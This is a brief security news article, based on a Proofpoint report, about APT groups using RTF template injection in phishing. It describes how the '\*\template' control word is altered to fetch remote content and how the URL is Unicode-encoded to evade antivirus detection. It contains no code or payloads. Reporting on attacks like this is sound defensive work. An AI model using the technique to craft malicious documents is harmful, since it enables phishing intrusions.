Three State sponsored threat actors from China, India and Russia is using a new novel RTF (Rich Text Format) technique in their recent phishing attacks.

RFT technique was spotted on phishing campaigns since March 2021 and firstly report by the security firm Proofpoint. They believe that this technique will be used by a wider audience of threat actors soon.

“RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file,” said researchers from Proofpoint

RTF document format are created by Microsoft which can be also open using WordPad and other applications found in operating systems. When creating these files an RTF template can be included specifying the text formatting of the document. These templates are supposed to be hosted locally but threat actors have abuse this to retrieve malicious content from a remote URL instead of local file.

“Proofpoint has identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild. While this technique appears to be making the rounds among APT actors in several nations, Proofpoint assesses with moderate confidence, based on the recent rise in its usage and the triviality of its implementation, that it could soon be adopted by cybercriminals as well.”

“By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination.”

To evade static detection signatures in anti-virus engines threat actors have used 16-bit Unicode characters instead of plaintext strings for the injected URL. Same with RTF files open through Microsoft the resource from the specified URL will be retrieved before displaying the content of the file.

URL Hiding (Source: ProofPoint)

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector. The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide”

“While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape. Ultimately this is a technique poised for wider adoption in the threat landscape beyond targeted phishing attacks with likely adopters being crimeware actors” Concludes the report

Reference

• Report by ProofPoint